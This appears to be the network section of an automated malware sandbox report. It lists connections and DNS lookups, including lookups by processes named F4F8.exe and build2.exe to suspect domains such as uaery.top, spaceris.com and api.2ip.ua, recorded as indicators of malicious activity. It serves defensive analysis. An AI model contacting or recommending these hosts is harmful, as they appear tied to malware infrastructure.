                                                                                                                                                                      GET https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/contacted_urls

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/contacted_domains

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/contacted_ips

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/execution_parents

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/pe_resource_parents

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/bundled_files

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/pe_resource_children

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/behaviour_mitre_trees

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/behaviours?limit=40

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/votes?relationships=item%2Cvoter

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/comments?relationships=item%2Cauthor

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/references?limit=10

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/related_references?limit=10

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/graphs?relationships=owner%2Cviewers%2Ceditors
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15567
                                                                                                                                                                      LocalService
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 129.233.182.56:443
                                                                                                                                                                      malpedia.caad.fkie.fraunhofer.de
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      8.8kB
                                                                                                                                                                      280.6kB
                                                                                                                                                                      116
                                                                                                                                                                      215
                                                                                                                                                                    • 129.233.182.56:443
                                                                                                                                                                      malpedia.caad.fkie.fraunhofer.de
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      19.9kB
                                                                                                                                                                      902.1kB
                                                                                                                                                                      355
                                                                                                                                                                      665
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 142.250.179.162:443
                                                                                                                                                                      googleads.g.doubleclick.net
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      2.0kB
                                                                                                                                                                      7.3kB
                                                                                                                                                                      11
                                                                                                                                                                      11
                                                                                                                                                                    • 142.251.36.6:443
                                                                                                                                                                      static.doubleclick.net
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      1.3kB
                                                                                                                                                                      6.0kB
                                                                                                                                                                      9
                                                                                                                                                                      8
                                                                                                                                                                    • 142.250.179.170:443
                                                                                                                                                                      jnn-pa.googleapis.com
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      5.3kB
                                                                                                                                                                      41.4kB
                                                                                                                                                                      26
                                                                                                                                                                      41
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 129.233.182.56:443
                                                                                                                                                                      malpedia.caad.fkie.fraunhofer.de
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      7.5kB
                                                                                                                                                                      121.8kB
                                                                                                                                                                      58
                                                                                                                                                                      98
                                                                                                                                                                    • 129.233.182.56:443
                                                                                                                                                                      malpedia.caad.fkie.fraunhofer.de
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      2.6kB
                                                                                                                                                                      34.4kB
                                                                                                                                                                      22
                                                                                                                                                                      32
                                                                                                                                                                    • 129.233.182.56:443
                                                                                                                                                                      malpedia.caad.fkie.fraunhofer.de
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      4.6kB
                                                                                                                                                                      75.6kB
                                                                                                                                                                      38
                                                                                                                                                                      64
                                                                                                                                                                    • 129.233.182.56:443
                                                                                                                                                                      malpedia.caad.fkie.fraunhofer.de
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      2.5kB
                                                                                                                                                                      64.3kB
                                                                                                                                                                      32
                                                                                                                                                                      53
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15567
                                                                                                                                                                      LocalService
                                                                                                                                                                    • 74.125.34.46:443
                                                                                                                                                                      www.virustotal.com
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      2.7kB
                                                                                                                                                                      22.2kB
                                                                                                                                                                      16
                                                                                                                                                                      25
                                                                                                                                                                    • 74.125.34.46:443
                                                                                                                                                                      www.virustotal.com
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      4.3kB
                                                                                                                                                                      7.8kB
                                                                                                                                                                      14
                                                                                                                                                                      18
                                                                                                                                                                    • 34.104.35.123:80
                                                                                                                                                                      http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                      http
                                                                                                                                                                      113.2kB
                                                                                                                                                                      6.4MB
                                                                                                                                                                      2400
                                                                                                                                                                      4604

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      206

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      206

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      206

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      206

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      206
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15567
                                                                                                                                                                      LocalService
                                                                                                                                                                    • 142.250.179.163:443
                                                                                                                                                                      update.googleapis.com
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      2.3kB
                                                                                                                                                                      6.7kB
                                                                                                                                                                      11
                                                                                                                                                                      11
                                                                                                                                                                    • 129.233.182.56:443
                                                                                                                                                                      malpedia.caad.fkie.fraunhofer.de
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      2.0kB
                                                                                                                                                                      29.7kB
                                                                                                                                                                      18
                                                                                                                                                                      28
                                                                                                                                                                    • 129.233.182.56:443
                                                                                                                                                                      malpedia.caad.fkie.fraunhofer.de
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      856 B
                                                                                                                                                                      7.5kB
                                                                                                                                                                      10
                                                                                                                                                                      11
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15567
                                                                                                                                                                      LocalService
                                                                                                                                                                    • 216.58.208.99:443
                                                                                                                                                                      beacons.gcp.gvt2.com
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      2.3kB
                                                                                                                                                                      7.6kB
                                                                                                                                                                      11
                                                                                                                                                                      11
                                                                                                                                                                    • 142.251.36.42:443
                                                                                                                                                                      content-autofill.googleapis.com
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      2.1kB
                                                                                                                                                                      6.6kB
                                                                                                                                                                      11
                                                                                                                                                                      11
                                                                                                                                                                    • 216.58.208.99:443
                                                                                                                                                                      beacons.gcp.gvt2.com
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      7.2kB
                                                                                                                                                                      8.9kB
                                                                                                                                                                      16
                                                                                                                                                                      12
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15567
                                                                                                                                                                      LocalService
                                                                                                                                                                    • 127.0.0.1:15567
                                                                                                                                                                      LocalService
                                                                                                                                                                    • 8.8.4.4:443
                                                                                                                                                                      https://dns.google/dns-query?dns=AAABAAABAAAAAAABA3d3dwdnc3RhdGljA2NvbQAAAQABAAApEAAAAAAAAFQADABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      tls, http2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      1.6kB
                                                                                                                                                                      7.0kB
                                                                                                                                                                      14
                                                                                                                                                                      14

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://dns.google/dns-query?dns=AAABAAABAAAAAAABA3d3dwdnc3RhdGljA2NvbQAAAQABAAApEAAAAAAAAFQADABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                    • 127.0.0.1:15567
                                                                                                                                                                      LocalService
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 142.250.179.206:443
                                                                                                                                                                      sb-ssl.google.com
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      19.0kB
                                                                                                                                                                      8.9kB
                                                                                                                                                                      22
                                                                                                                                                                      17
                                                                                                                                                                    • 127.0.0.1:15567
                                                                                                                                                                      LocalService
                                                                                                                                                                    • 127.0.0.1:15567
                                                                                                                                                                      LocalService
                                                                                                                                                                    • 108.156.60.113:443
                                                                                                                                                                      adwcleaner.malwarebytes.com
                                                                                                                                                                      tls
                                                                                                                                                                      adwcleaner.exe
                                                                                                                                                                      1.2kB
                                                                                                                                                                      5.0kB
                                                                                                                                                                      9
                                                                                                                                                                      10
                                                                                                                                                                    • 108.156.60.113:443
                                                                                                                                                                      adwcleaner.malwarebytes.com
                                                                                                                                                                      tls
                                                                                                                                                                      adwcleaner.exe
                                                                                                                                                                      982 B
                                                                                                                                                                      5.3kB
                                                                                                                                                                      11
                                                                                                                                                                      14
                                                                                                                                                                    • 127.0.0.1:15567
                                                                                                                                                                      LocalService
                                                                                                                                                                    • 23.236.181.126:443
                                                                                                                                                                      https
                                                                                                                                                                      LocalService
                                                                                                                                                                      11.0kB
                                                                                                                                                                      7.0kB
                                                                                                                                                                      27
                                                                                                                                                                      31
                                                                                                                                                                    • 108.156.60.113:443
                                                                                                                                                                      adwcleaner.malwarebytes.com
                                                                                                                                                                      tls
                                                                                                                                                                      adwcleaner.exe
                                                                                                                                                                      982 B
                                                                                                                                                                      5.3kB
                                                                                                                                                                      11
                                                                                                                                                                      14
                                                                                                                                                                    • 108.156.60.113:443
                                                                                                                                                                      adwcleaner.malwarebytes.com
                                                                                                                                                                      tls
                                                                                                                                                                      adwcleaner.exe
                                                                                                                                                                      20.6kB
                                                                                                                                                                      1.2MB
                                                                                                                                                                      437
                                                                                                                                                                      866
                                                                                                                                                                    • 108.156.60.113:443
                                                                                                                                                                      adwcleaner.malwarebytes.com
                                                                                                                                                                      tls
                                                                                                                                                                      1.9kB
                                                                                                                                                                      5.2kB
                                                                                                                                                                      11
                                                                                                                                                                      13
                                                                                                                                                                    • 54.188.37.165:443
                                                                                                                                                                      telemetry.malwarebytes.com
                                                                                                                                                                      tls
                                                                                                                                                                      4.0kB
                                                                                                                                                                      4.5kB
                                                                                                                                                                      15
                                                                                                                                                                      13
                                                                                                                                                                    • 127.0.0.1:15567
                                                                                                                                                                      LocalService
                                                                                                                                                                    • 216.239.32.116:443
                                                                                                                                                                      beacons4.gvt2.com
                                                                                                                                                                      tls
                                                                                                                                                                      2.1kB
                                                                                                                                                                      7.1kB
                                                                                                                                                                      10
                                                                                                                                                                      9
                                                                                                                                                                    • 108.156.60.113:443
                                                                                                                                                                      adwcleaner.malwarebytes.com
                                                                                                                                                                      tls
                                                                                                                                                                      1.8kB
                                                                                                                                                                      5.2kB
                                                                                                                                                                      11
                                                                                                                                                                      13
                                                                                                                                                                    • 54.188.37.165:443
                                                                                                                                                                      telemetry.malwarebytes.com
                                                                                                                                                                      tls
                                                                                                                                                                      2.5kB
                                                                                                                                                                      4.4kB
                                                                                                                                                                      12
                                                                                                                                                                      12
                                                                                                                                                                    • 108.156.60.113:443
                                                                                                                                                                      adwcleaner.malwarebytes.com
                                                                                                                                                                      tls
                                                                                                                                                                      1.2kB
                                                                                                                                                                      5.0kB
                                                                                                                                                                      9
                                                                                                                                                                      10
                                                                                                                                                                    • 108.156.60.113:443
                                                                                                                                                                      adwcleaner.malwarebytes.com
                                                                                                                                                                      tls
                                                                                                                                                                      1.1kB
                                                                                                                                                                      5.0kB
                                                                                                                                                                      8
                                                                                                                                                                      9
                                                                                                                                                                    • 108.156.60.113:443
                                                                                                                                                                      adwcleaner.malwarebytes.com
                                                                                                                                                                      tls
                                                                                                                                                                      942 B
                                                                                                                                                                      5.3kB
                                                                                                                                                                      10
                                                                                                                                                                      13
                                                                                                                                                                    • 108.156.60.113:443
                                                                                                                                                                      adwcleaner.malwarebytes.com
                                                                                                                                                                      tls
                                                                                                                                                                      942 B
                                                                                                                                                                      5.3kB
                                                                                                                                                                      10
                                                                                                                                                                      13
                                                                                                                                                                    • 108.156.60.113:443
                                                                                                                                                                      adwcleaner.malwarebytes.com
                                                                                                                                                                      tls
                                                                                                                                                                      29.5kB
                                                                                                                                                                      1.2MB
                                                                                                                                                                      595
                                                                                                                                                                      867
                                                                                                                                                                    • 108.156.60.113:443
                                                                                                                                                                      adwcleaner.malwarebytes.com
                                                                                                                                                                      tls
                                                                                                                                                                      1.5kB
                                                                                                                                                                      5.2kB
                                                                                                                                                                      11
                                                                                                                                                                      13
                                                                                                                                                                    • 54.71.113.68:443
                                                                                                                                                                      telemetry.malwarebytes.com
                                                                                                                                                                      tls
                                                                                                                                                                      1.6kB
                                                                                                                                                                      4.4kB
                                                                                                                                                                      11
                                                                                                                                                                      11
                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                      potunulit.org
                                                                                                                                                                      dns
                                                                                                                                                                      59 B
                                                                                                                                                                      91 B
                                                                                                                                                                      1
                                                                                                                                                                      1

                                                                                                                                                                      DNS Request

                                                                                                                                                                      potunulit.org

                                                                                                                                                                      DNS Response

                                                                                                                                                                      188.114.96.0
                                                                                                                                                                      188.114.97.0

                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                      polyzi.com
                                                                                                                                                                      dns
                                                                                                                                                                      56 B
                                                                                                                                                                      72 B
                                                                                                                                                                      1
                                                                                                                                                                      1

                                                                                                                                                                      DNS Request

                                                                                                                                                                      polyzi.com

                                                                                                                                                                      DNS Response

                                                                                                                                                                      95.217.49.230

                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                      api.2ip.ua
                                                                                                                                                                      dns
                                                                                                                                                                      F4F8.exe
                                                                                                                                                                      56 B
                                                                                                                                                                      72 B
                                                                                                                                                                      1
                                                                                                                                                                      1

                                                                                                                                                                      DNS Request

                                                                                                                                                                      api.2ip.ua

                                                                                                                                                                      DNS Response

                                                                                                                                                                      162.0.217.254

                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                      uaery.top
                                                                                                                                                                      dns
                                                                                                                                                                      F4F8.exe
                                                                                                                                                                      55 B
                                                                                                                                                                      215 B
                                                                                                                                                                      1
                                                                                                                                                                      1

                                                                                                                                                                      DNS Request

                                                                                                                                                                      uaery.top

                                                                                                                                                                      DNS Response

                                                                                                                                                                      190.219.54.242
                                                                                                                                                                      58.235.189.192
                                                                                                                                                                      211.171.233.126
                                                                                                                                                                      175.119.10.231
                                                                                                                                                                      213.231.134.136
                                                                                                                                                                      210.182.29.70
                                                                                                                                                                      185.95.186.58
                                                                                                                                                                      187.212.192.17
                                                                                                                                                                      187.170.238.164
                                                                                                                                                                      187.232.159.164

                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                      spaceris.com
                                                                                                                                                                      dns
                                                                                                                                                                      F4F8.exe
                                                                                                                                                                      58 B
                                                                                                                                                                      218 B
                                                                                                                                                                      1
                                                                                                                                                                      1

                                                                                                                                                                      DNS Request

                                                                                                                                                                      spaceris.com

                                                                                                                                                                      DNS Response

                                                                                                                                                                      195.158.3.162
                                                                                                                                                                      175.119.10.231
                                                                                                                                                                      211.119.84.111
                                                                                                                                                                      190.147.188.50
                                                                                                                                                                      211.59.14.90
                                                                                                                                                                      95.107.163.44
                                                                                                                                                                      123.140.161.243
                                                                                                                                                                      190.219.54.242
                                                                                                                                                                      58.235.189.192
                                                                                                                                                                      210.182.29.70

                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                      t.me
                                                                                                                                                                      dns
                                                                                                                                                                      build2.exe
                                                                                                                                                                      50 B
                                                                                                                                                                      66 B
                                                                                                                                                                      1
                                                                                                                                                                      1

                                                                                                                                                                      DNS Request

                                                                                                                                                                      t.me

                                                                                                                                                                      DNS Response

                                                                                                                                                                      149.154.167.99

                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                      vatra.at
                                                                                                                                                                      dns
                                                                                                                                                                      54 B
                                                                                                                                                                      214 B
                                                                                                                                                                      1
                                                                                                                                                                      1

                                                                                                                                                                      DNS Request

                                                                                                                                                                      vatra.at

                                                                                                                                                                      DNS Response


                                                                                                                                                                    • 224.0.0.251:5353
                                                                                                                                                                      4.5kB
                                                                                                                                                                      76
                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                      clients2.google.com
                                                                                                                                                                      dns
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      65 B
                                                                                                                                                                      105 B
                                                                                                                                                                      1
                                                                                                                                                                      1

                                                                                                                                                                      DNS Request

                                                                                                                                                                      clients2.google.com

                                                                                                                                                                      DNS Response

                                                                                                                                                                      172.217.168.238

                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                      accounts.google.com
                                                                                                                                                                      dns
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      65 B
                                                                                                                                                                      81 B
                                                                                                                                                                      1
                                                                                                                                                                      1

                                                                                                                                                                      DNS Request

                                                                                                                                                                      accounts.google.com

                                                                                                                                                                      DNS Response

                                                                                                                                                                      142.251.36.45

                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                      edgedl.me.gvt1.com
                                                                                                                                                                      dns
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      64 B
                                                                                                                                                                      80 B
                                                                                                                                                                      1
                                                                                                                                                                      1

                                                                                                                                                                      DNS Request

                                                                                                                                                                      edgedl.me.gvt1.com

                                                                                                                                                                      DNS Response

                                                                                                                                                                      34.104.35.123

                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                      apis.google.com
                                                                                                                                                                      dns
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      61 B
                                                                                                                                                                      98 B
                                                                                                                                                                      1
                                                                                                                                                                      1

                                                                                                                                                                      DNS Request

                                                                                                                                                                      apis.google.com

                                                                                                                                                                      DNS Response

                                                                                                                                                                      216.58.208.110

                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                      dns.google
                                                                                                                                                                      dns
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      56 B
                                                                                                                                                                      88 B
                                                                                                                                                                      1
                                                                                                                                                                      1

                                                                                                                                                                      DNS Request

                                                                                                                                                                      dns.google

                                                                                                                                                                      DNS Response

                                                                                                                                                                      8.8.4.4
                                                                                                                                                                      8.8.8.8

                                                                                                                                                                    • 8.8.4.4:443
                                                                                                                                                                      dns.google
                                                                                                                                                                      https
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      13.5kB
                                                                                                                                                                      29.2kB
                                                                                                                                                                      78
                                                                                                                                                                      86
                                                                                                                                                                    • 216.58.208.110:443
                                                                                                                                                                      apis.google.com
                                                                                                                                                                      https
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      5.9kB
                                                                                                                                                                      47.2kB
                                                                                                                                                                      22
                                                                                                                                                                      35
                                                                                                                                                                    • 142.251.36.14:443
                                                                                                                                                                      https
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      6.8kB
                                                                                                                                                                      28.4kB
                                                                                                                                                                      21
                                                                                                                                                                      24
                                                                                                                                                                    • 34.96.102.137:443
                                                                                                                                                                      https
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      4.1kB
                                                                                                                                                                      9.3kB
                                                                                                                                                                      12
                                                                                                                                                                      11
                                                                                                                                                                    • 34.96.102.137:443
                                                                                                                                                                      https
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      4.7kB
                                                                                                                                                                      50.1kB
                                                                                                                                                                      27
                                                                                                                                                                      43
                                                                                                                                                                    • 142.250.179.202:443
                                                                                                                                                                      https
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      3.4kB
                                                                                                                                                                      6.2kB
                                                                                                                                                                      6
                                                                                                                                                                      6
                                                                                                                                                                    • 142.250.27.154:443
                                                                                                                                                                      https
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      3.4kB
                                                                                                                                                                      6.0kB
                                                                                                                                                                      6
                                                                                                                                                                      5
                                                                                                                                                                    • 142.250.179.142:443
                                                                                                                                                                      https
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      5.8kB
                                                                                                                                                                      8.8kB
                                                                                                                                                                      8
                                                                                                                                                                      9
                                                                                                                                                                    • 8.8.4.4:443
                                                                                                                                                                      dns.google
                                                                                                                                                                      https
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      2.9kB
                                                                                                                                                                      5.5kB
                                                                                                                                                                      4
                                                                                                                                                                      4
                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                      edgedl.me.gvt1.com
                                                                                                                                                                      dns
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      64 B
                                                                                                                                                                      80 B
                                                                                                                                                                      1
                                                                                                                                                                      1

                                                                                                                                                                      DNS Request

                                                                                                                                                                      edgedl.me.gvt1.com

                                                                                                                                                                      DNS Response

                                                                                                                                                                      34.104.35.123

                                                                                                                                                                      204 B
                                                                                                                                                                      2
                                                                                                                                                                      2

                                                                                                                                                                      DNS Request

                                                                                                                                                                      malwarology.substack.com

                                                                                                                                                                      DNS Request

                                                                                                                                                                      malwarology.substack.com

                                                                                                                                                                      DNS Response

                                                                                                                                                                      104.18.33.245
                                                                                                                                                                      172.64.154.11

                                                                                                                                                                      DNS Response

                                                                                                                                                                      104.18.33.245
